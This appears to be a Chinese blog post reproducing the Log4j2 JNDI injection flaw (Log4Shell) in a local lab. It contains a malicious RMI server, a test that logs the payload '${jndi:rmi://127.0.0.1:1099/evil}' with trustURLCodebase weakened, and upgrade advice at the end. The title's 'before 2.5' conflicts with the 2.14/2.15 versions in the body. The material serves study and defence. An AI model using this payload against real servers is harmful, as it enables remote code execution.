Log4j2版本2.5之前的漏洞复现

Log4j2版本2.5之前的漏洞复现,第1张

Log4j2版本2.5之前的漏洞复现 1.依赖
// 2.15.0

    org.slf4j
    slf4j-api
    2.14.0


    org.apache.logging.log4j
    log4j-core
    2.14.0

2.恶意服务代码
package com.jay.rmi;

import com.sun.jndi.rmi.registry.ReferenceWrapper;

import javax.naming.Reference;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;

public class RMIserver {
	public static void main(String[] args) {
		try {
			LocateRegistry.createRegistry(1099);
			Registry registry = LocateRegistry.getRegistry();

			System.out.println("create RMI register on port 1099 ");
			Reference reference = new Reference("EvilObj","EvilObj", null); // "http://127.0.0.1:80/"
			ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference);
			registry.bind("evil",referenceWrapper);
		} catch (Exception e){
			e.printStackTrace();
		}
	}
}
package com.jay.rmi;

public class EvilObj {
	static {
		System.out.println("我是jay");
	}
}
3.测试
package com.jay;

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class Log4jTest {
	private static final Logger LOGGER = LogManager.getLogger();

	public static void main(String[] args) {
        // 以下三行低版本jdk不需要
		System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase","true");
		System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase","true");
		System.setProperty("java.rmi.server.useCodebaseOnly","false");

		String userName = "${jndi:rmi://127.0.0.1:1099/evil}";
		// String userName = "${java:os}";
		// String userName = "${java:vm}";
		LOGGER.info("hello, {}!", userName);
	}
}

先开启RMIserver
在运行Log4jTest

结果 ${java:os} 2.14打印以下内容, 2.15无法打印。

2021-12-13 13:42:00.003 [main] INFO [Log4jTest:22] - hello, Windows 10 10.0, architecture: amd64-64!

Process finished with exit code 0

具体大家可以试试自己测试。

总结

把版本升级至2.15或者把jdk版本升高即可暂时修复此问题。

欢迎分享,转载请注明来源:内存溢出

原文地址: http://outofmemory.cn/zaji/5669584.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2022-12-16
下一篇 2022-12-16

发表评论

登录后才能评论

评论列表(0条)

保存